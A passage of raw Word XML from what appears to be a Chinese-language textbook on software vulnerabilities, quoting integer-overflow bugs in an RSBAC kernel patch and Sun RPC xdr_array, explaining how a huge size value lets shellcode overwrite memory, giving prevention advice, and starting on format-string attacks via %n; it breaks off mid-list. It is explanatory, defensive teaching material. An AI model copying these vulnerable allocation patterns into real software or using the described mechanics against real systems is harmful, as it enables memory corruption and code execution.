          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">return -RSBAC_ENOMEM; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B446E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="607" w:firstLine="1275"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ttl_array=vmalloc(sizeof(*ttl_array)*arg.get_group_members.maxnum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D1D35" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="607" w:firstLine="1275"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>if(!ttl_array){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F64DCD" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="807" w:firstLine="1695"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>vfree(user_array);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E137941" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="807" w:firstLine="1695"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>return -RSBAC_ENOMEM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F8CE7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="607" w:firstLine="1275"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D4F09" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="405" w:firstLine="850"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DF34B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="405" w:firstLine="850"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">err=rsbac_acl_get_group_members(…); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB7B16" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="405" w:firstLine="850"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DDB19E"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hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF3BDD5"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67C68080"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这段代码位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>/linux-2.6.21.1-rsbac-1.3.4/include/rsbac/rkmem</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>if((arg.get_group_members.maxnum &lt;= 0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处的数据越界检查部分不能足够的防止接下来2次</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>vmalloc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内的整数乘法运算导致的整数溢出，若提供一个足够大的整数，例如0xffffffff的值，给arg.get_group_members.maxnum，将导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>vmalloc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处和这个值相乘的整数溢出，并使得ttl_array 和user_array分配的缓冲区小于程序中预期的大小。恶意代码可以通过rsbac_acl_get_group_members函数拷贝Shellcode到这个缓冲区里，可能改写tty_array和user_array指向的缓冲区后面的一些数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C8C89" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE83C09" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.SUN RPC XDR库代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53FE0F"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hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274668A8"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 xml:space="preserve">bool_t xdr_array (xdrs, addrp, sizep, maxsize, elsize, elproc) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329BB63"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0306B450"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XDR *xdrs;caddr_t *addrp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33401164"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u_int *sizep;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8093D"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u_int maxsize;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB746D2"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u_int elsize;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524C214"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xdrproc_t elproc; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36404D"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u_int i; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D84F0"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caddr_t target = *addrp; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1E985"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u_int c; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35985062"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bool_t stat = TRUE; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F509ADE"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u_int nodesize; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251F344"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE4F85"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c = *sizep; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D76A9"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if ((c &gt; maxsize) &amp;&amp; (xdrs-&gt;x_op != XDR_FREE))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6E06F7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DF5D7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="402" w:firstLine="844"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>return FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D1738"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E907836"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nodesize = c * elsize;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760AAA7"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 ... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F8609"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*addrp = target = mem_alloc (nodesize); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1145D80C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DF07E"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for (i = 0; (i &lt; c) &amp;&amp; stat; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FEB16" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="402" w:firstLine="844"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">stat = (*elproc) (xdrs, target, LASTUNSIGNED); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A989E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="202" w:firstLine="424"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">target += elsize; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D8EEA" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11104C40"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作为Sun Microsystems xdr库的一部分分发的xdr_array(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中存在整数溢出（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>CA-2002-25</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。这种溢出已被证明会导致多个应用程序中可远程利用的缓冲区溢出，从而导致执行任意代码，整数溢出点在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>nodesize = c * elsize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中elsize可被攻击者操纵，而代码未检查nodesize的大小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949F14B"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XDR（外部数据表示）库用于提供独立于平台的方法，用于通过网络连接将数据从一个系统进程发送到另一个系统进程。这些例程通常用于远程过程调用（RPC）实现，以向需要使用公共接口与许多不同类型系统交互的应用程序程序员提供透明性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA8D01" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.4.5 如何防范整数溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0597F"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整数溢出可能是栈溢出，堆溢出等溢出的来源，整数溢出漏洞很大程度上，是因为程序员不好的编程习惯和疏忽，这要求程序员要有较高的编程素质，对程序的不同运行情况要考虑全面具体。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653639D2"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要防范整数溢出，首先要有整数安全意识，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>形成关于特殊数据输入的意识，比如之前先确定最大和最小输入，使用合适的数据类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对于上述的整数宽度溢出漏洞，若使用表示范围更大的整数类型能有效避免该类漏洞，同时要注意无符号数和有符号数的运算，熟悉各种数据类型的表示范围，避免整数符号溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C552193"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其次要避免隐患运算直接操作，由于整数加法和乘法易造成整数运算溢出，应</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>尽量避免对两个正数相加或相乘之后，再取结果比较，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如若存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>len1+len2&lt; MAX_IINFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的判断，可</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>改成if (MAX_INFO - len1 &gt; len2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将有效避免整数运算溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F60103"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对于数组的操作要进行越界判断，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>在使用变量申请内存，或者作为数组下标时，注意对越界的监测。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外还可以通过代码审计，安全测试等方式检测整数溢出的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30918644" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00405320" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00405320">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化字符串溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D89EB1"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格式化字符串溢出的原因，主要是函数未对用户输入内容进行过滤，如p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>rintf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>fprintf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、v</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，这些函数的输入参数为用户可控的数据，函数对这些数据进行格式化。当参数存在“%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”、“%x”等格式化字符时，可以从堆栈或其他内存区域读取数据，若恶意代码能精确控制栈中的数据，结合printf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数或其他类似功能的函数就可以输出内存数据，实现数据泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664CCAC9"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除此之外，“%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”格式化字符可以向任一地址写入任意数据，若恶意代码精确控制栈中数据，则可以结合printf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他类似功能的函数向任意内存地址写入被格式化的字节数，从而劫持代码控制流，导致恶意代码执行。易受威胁的函数有p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>rintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>sprintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>fprintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>snprintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>vprintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>vsprintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
